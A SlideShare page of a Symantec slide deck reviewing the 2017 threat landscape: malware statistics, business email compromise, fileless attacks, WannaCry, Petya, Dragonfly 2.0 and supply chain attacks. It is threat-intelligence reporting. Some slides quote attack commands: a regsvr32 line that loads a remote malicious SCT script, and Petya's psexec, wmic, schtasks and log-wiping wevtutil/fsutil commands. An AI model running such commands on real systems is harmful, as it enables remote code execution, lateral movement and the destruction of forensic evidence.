SlideShare uma empresa Scribd logo
1 de 26
Presenter Date
Threat Landscape
Q2 / 2017 Update
Asim Rab
Candid Wueest
Sept 2017
2Copyright © 2017 Symantec Corporation
General trends
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies
3Copyright © 2017 Symantec Corporation
o More than 2 Million new malware variants per day
o Script malware leads to many variants
Malware statistics Region % of global
USA 27.26%
Japan 6.49%
China 6.04%
India 5.82%
Brazil 4.12%
Germany 3.97%
Great Britain 3.59%
Canada 2.65%
France 2.55%
Russia 2.32%
Australia 2.17%
Italy 2.03%
Mexico 1.67%
South Korea 1.34%
Turkey 1.28%
Netherlands 1.27%
Spain 1.26%
Indonesia 1.11%
Poland 1.08%
Taiwan 0.90%
0.0
10.0
20.0
30.0
40.0
50.0
60.0
70.0
80.0
90.0
100.0
January February March April May June July August
New
malware
variants per
month in
millions
4Copyright © 2017 Symantec Corporation
Web attacks still elevated
0
200,000
400,000
600,000
800,000
1,000,000
1,200,000
1,400,000
January February March April May June July August
o Normally no 0-days exploits used
o RIG toolkit is most active
o Link spread by email or
advertisement
o Sometimes infections are
restricted to specific IP addresses
o Supply chain attacks increased
Web attacks blocked per day
5Copyright © 2017 Symantec Corporation
Malicious doc containing
macro with social engineering
Malicious documents still common
5
Embedded binary can be
double clicked
6Copyright © 2017 Symantec Corporation
o More than half of the malicious attachments are script files
o Macros or JavaScript are usually downloading final payload
o Most common payloads are ransomware and financial Trojans
Email
Email
e.g. invoice or receipt
Attachment
e.g. JavaScript
Downloader
e.g. PowerShell
Payload
e.g. Ransomware
Whitepaper available
7Copyright © 2017 Symantec Corporation
Section
Business Email
Compromise
(BEC)
2
8Copyright © 2017 Symantec Corporation
4.3
6.8
4.5 5.1
5.9 4.6
0.0
1.0
2.0
3.0
4.0
5.0
6.0
7.0
8.0
Jan Feb Mar Apr May Jun
BEC email received per targeted organization
Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses Oct 2013 – Dec 2016 was over $5bn
o 8,000 businesses targeted monthly
9Copyright © 2017 Symantec Corporation
Create a sense of urgency, requiring
immediate action, attempting to
pressure the recipient into action
BEC subject lines
Top three subjects
feature in 2/3 of all
emails
PAYMENT
URGENT
REQUEST
10Copyright © 2017 Symantec Corporation
Section
Living off the land
3
Whitepaper available
11Copyright © 2017 Symantec Corporation
When attackers turn what you have against you
o Fewer new files on disk
o more difficult to detect attack, no IoC to share
o Use off-the-shelf tools & cloud services
o difficult to determine intent & source
o These tools are ubiquitous
o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting
more difficult
o use simple and proven methods such as email & social
engineering
Living off the land
11
12Copyright © 2017 Symantec Corporation
Multiple fileless options exist but not all are truly fileless
Fileless attacks
e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks
Fileless loadpoint
Non-PE files
Dual-use tools
Documents containing macros, PDFs with JavaScript and scripts
(VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things
13Copyright © 2017 Symantec Corporation
Living off the land attack chain
Exploit in memory
e.g. SMB EternalBlue
Email with Non-PE file
e.g. document macro
Weak or stolen credentials
e.g. RDP password guess
Incursion
Remote script dropper
e.g. LNK with PowerShell from cloud
Memory only malware
e.g. SQL Slammer
Non-persistent
Persistent
Persistence
Fileless persistence loadpoint
e.g. JScript in registry
Traditional methods
Payload
Regular non-fileless payload
Non-PE file payload
e.g. PowerShell script
Memory only payload
e.g. Mirai DDoS
Dual-use tools
e.g. netsh or PsExec.exe
14Copyright © 2017 Symantec Corporation
o Scripts are very common, especially PowerShell
o Many script toolkits available, e.g. PS Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Non-PE files
Whitepaper available
15Copyright © 2017 Symantec Corporation
Fileless loadpoints
o Registry run key can point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Downloder.Dromedan (40,000 detections per day)
o Embedded JScript uses WMI to execute a
PowerShell payload
o Script stores encoded DLL in the registry
for later use
Example: Remote SCT load
Malicious.sct file
16Copyright © 2017 Symantec Corporation
Section
Ransomware
4
Whitepaper available
17Copyright © 2017 Symantec Corporation
Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
0
10,000
20,000
30,000
40,000
50,000
60,000
70,000
80,000
90,000
Jan-16
Feb-16
Mar-16
Apr-16
May-16
Jun-16
Jul-16
Aug-16
Sep-16
Oct-16
Nov-16
Dec-16
Jan-17
Feb-17
Mar-17
Apr-17
May-17
Jun-17
Trend Line
Other
Countries
31%
United States
29%
Japan
9%
Italy
8%
India
4%
Germany
4%
Netherlands
3%
UK
3%
Australia
3%
Russia
3%
Canada
3%
18Copyright © 2017 Symantec Corporation
o 42% of ransomware infections in 2017 were in enterprises
o Due to WannaCry and Petya
o Attacks against cloud storage increased
Ransomware in enterprises
0
10,000
20,000
30,000
40,000
50,000
60,000
Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17
Consumer Enterprise
19Copyright © 2017 Symantec Corporation
o 1 Billion EternalBlue infection attempts blocked
o Profit $140K, Bitcoin accounts emptied August 3rd
o Linked to Lazarus group
WannaCry
0
20000
40000
60000
80000
100000
120000
21Copyright © 2017 Symantec Corporation
o Petya (June variant) classified as a wiper
o Semi-targeted infections through supply chain hack (MEDoc)
o Profit $10K, Bitcoin account emptied July 4th
Petya
0
20
40
60
80
100
120
140
160
22Copyright © 2017 Symantec Corporation
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o [server_name]admin$perfc.dat
o psexec rundll32.exe c:windowsperfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec fails
o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create
“%System%rundll32.exe “%Windows%perfc.dat" #1 60”
o Scheduled task to restart into the malicious MBR payload
o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traces
o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools
23Copyright © 2017 Symantec Corporation
Section
Targeted attack groups
5
24Copyright © 2017 Symantec Corporation
o Active since December 2015 in Europe and North America
o Ongoing attacks against energy sector, mainly in Turkey and U.S.
Infiltration
o Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using Shelter evasion framework
o Various backdoors:
Dragonfly 2.0
• Trojan.Listrix
• Trojan.Credrix
• Backdoor.Goodor
• Backdoor.Dorshell
• Trojan.Karagany.B
• Trojan.Heriplor
Slide deck available
25Copyright © 2017 Symantec Corporation
o Uses living off the land tactics
o PowerShell, PsExec, and BITSAdmin
o Phisherly toolkit became available on GitHub in 2016
o Document used SMB template link to leak credentials
o Screenutil and Shelter are available online
Goal
o Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
Dragonfly 2.0
26Copyright © 2017 Symantec Corporation
o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through update process
o Trojanized updates are difficult to discover
o Trusted domain, digitally signed, trusted update process,…
Examples:
o MEdoc (Petya June/2017)
o CCleaner (Aug/2017)
o Python modules (Sept/2017)
o ICS supplier (Dragonfly 2014)
Supply chain attacks increasing
27Copyright © 2017 Symantec Corporation
o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution
Summary

Mais conteúdo relacionado

Mais procurados

Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareQuick Heal Technologies Ltd.
 
Ransomware: Mitigation Through Preparation
Ransomware: Mitigation Through PreparationRansomware: Mitigation Through Preparation
Ransomware: Mitigation Through PreparationHostway|HOSTING
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniquesSymantec Security Response
 
Ransomware - The Growing Threat
Ransomware - The Growing ThreatRansomware - The Growing Threat
Ransomware - The Growing ThreatNick Miller
 
What is wanna cry ransomware attack
What is wanna cry ransomware attackWhat is wanna cry ransomware attack
What is wanna cry ransomware attacki-engage
 
seminar report on What is ransomware
seminar report on What is ransomwareseminar report on What is ransomware
seminar report on What is ransomwareJawhar Ali
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 
How to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareHow to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareKaspersky
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...ClearDATACloud
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring TipsNetFort
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Roger Hagedorn
 

Mais procurados (20)

WannaCry Ransomware
 WannaCry Ransomware WannaCry Ransomware
WannaCry Ransomware
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
 
Ransomware: Mitigation Through Preparation
Ransomware: Mitigation Through PreparationRansomware: Mitigation Through Preparation
Ransomware: Mitigation Through Preparation
 
ITPG Secure on WannaCry
ITPG Secure on WannaCryITPG Secure on WannaCry
ITPG Secure on WannaCry
 
Living off the land and fileless attack techniques
Living off the land and fileless attack techniquesLiving off the land and fileless attack techniques
Living off the land and fileless attack techniques
 
Ransomware
RansomwareRansomware
Ransomware
 
Ransomware - The Growing Threat
Ransomware - The Growing ThreatRansomware - The Growing Threat
Ransomware - The Growing Threat
 
Ransomware: Wannacry
Ransomware: WannacryRansomware: Wannacry
Ransomware: Wannacry
 
What is wanna cry ransomware attack
What is wanna cry ransomware attackWhat is wanna cry ransomware attack
What is wanna cry ransomware attack
 
seminar report on What is ransomware
seminar report on What is ransomwareseminar report on What is ransomware
seminar report on What is ransomware
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
 
How to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareHow to protect your business from Wannacry Ransomware
How to protect your business from Wannacry Ransomware
 
Ransomware
RansomwareRansomware
Ransomware
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!
 
Analysing Ransomware
Analysing RansomwareAnalysing Ransomware
Analysing Ransomware
 
Ransomware - Friend or Foe
Ransomware - Friend or FoeRansomware - Friend or Foe
Ransomware - Friend or Foe
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring Tips
 
Wannacry
WannacryWannacry
Wannacry
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
 

Destaque

Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemCrowdStrike
 
Fileless Malware Infections
Fileless Malware InfectionsFileless Malware Infections
Fileless Malware InfectionsRamon
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetCrowdStrike
 
Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...Symantec Security Response
 
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017Carol Smith
 

Destaque (6)

Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop ThemUnderstanding Fileless (or Non-Malware) Attacks and How to Stop Them
Understanding Fileless (or Non-Malware) Attacks and How to Stop Them
 
Fileless Malware Infections
Fileless Malware InfectionsFileless Malware Infections
Fileless Malware Infections
 
State of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers MindsetState of Endpoint Security: The Buyers Mindset
State of Endpoint Security: The Buyers Mindset
 
Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...Email threats 2017: Users encounter threats through email twice as often as o...
Email threats 2017: Users encounter threats through email twice as often as o...
 
Catching fileless attacks
Catching fileless attacksCatching fileless attacks
Catching fileless attacks
 
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
 

Semelhante a Threat landscape update: June to September 2017

RSA Monthly Online Fraud Report -- June 2014
RSA Monthly Online Fraud Report -- June 2014RSA Monthly Online Fraud Report -- June 2014
RSA Monthly Online Fraud Report -- June 2014EMC
 
Defending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecurityDefending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecuritySophos Benelux
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Secure Use of IT
Secure Use of ITSecure Use of IT
Secure Use of ITMichael Lew
 
Next Dimension and Cisco | Solutions for PIPEDA Compliance
Next Dimension and Cisco | Solutions for PIPEDA ComplianceNext Dimension and Cisco | Solutions for PIPEDA Compliance
Next Dimension and Cisco | Solutions for PIPEDA ComplianceNext Dimension Inc.
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsAndrea Bissoli
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile AttackIRJET Journal
 
From velvet to silk there is still a lot of sweat
From velvet to silk  there is still a lot of sweatFrom velvet to silk  there is still a lot of sweat
From velvet to silk there is still a lot of sweatStefano Maccaglia
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-macCyphort
 
EverSec + Cyphort: Big Trends in Cybersecurity
EverSec + Cyphort: Big Trends in CybersecurityEverSec + Cyphort: Big Trends in Cybersecurity
EverSec + Cyphort: Big Trends in CybersecurityCyphort
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious CodeSatria Ady Pradana
 
Malware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things MalwareMalware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things MalwareCyphort
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondAPNIC
 
Continuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleContinuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleRogue Wave Software
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017Bret Piatt
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoKatie Nickels
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersPriyanka Aash
 

Semelhante a Threat landscape update: June to September 2017 (20)

RSA Monthly Online Fraud Report -- June 2014
RSA Monthly Online Fraud Report -- June 2014RSA Monthly Online Fraud Report -- June 2014
RSA Monthly Online Fraud Report -- June 2014
 
Defending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen SecurityDefending the Endpoint with Next-Gen Security
Defending the Endpoint with Next-Gen Security
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Secure Use of IT
Secure Use of ITSecure Use of IT
Secure Use of IT
 
Next Dimension and Cisco | Solutions for PIPEDA Compliance
Next Dimension and Cisco | Solutions for PIPEDA ComplianceNext Dimension and Cisco | Solutions for PIPEDA Compliance
Next Dimension and Cisco | Solutions for PIPEDA Compliance
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systems
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
603535ransomware
603535ransomware603535ransomware
603535ransomware
 
Ransomeware : A High Profile Attack
Ransomeware : A High Profile AttackRansomeware : A High Profile Attack
Ransomeware : A High Profile Attack
 
From velvet to silk there is still a lot of sweat
From velvet to silk  there is still a lot of sweatFrom velvet to silk  there is still a lot of sweat
From velvet to silk there is still a lot of sweat
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
EverSec + Cyphort: Big Trends in Cybersecurity
EverSec + Cyphort: Big Trends in CybersecurityEverSec + Cyphort: Big Trends in Cybersecurity
EverSec + Cyphort: Big Trends in Cybersecurity
 
(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code(Training) Malware - To the Realm of Malicious Code
(Training) Malware - To the Realm of Malicious Code
 
Malware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things MalwareMalware's Most Wanted: Linux and Internet of Things Malware
Malware's Most Wanted: Linux and Internet of Things Malware
 
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyondLessons learned from 2017 cybersecurity incidents, 2018 and beyond
Lessons learned from 2017 cybersecurity incidents, 2018 and beyond
 
Continuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycleContinuous security: Bringing agility to the secure development lifecycle
Continuous security: Bringing agility to the secure development lifecycle
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017
 
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status QuoBSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
BSidesLV 2018 - Katie Nickels and John Wunder - ATT&CKing the Status Quo
 
Computer viruses
Computer virusesComputer viruses
Computer viruses
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
 

Último

The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 

Último (20)

The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

Threat landscape update: June to September 2017

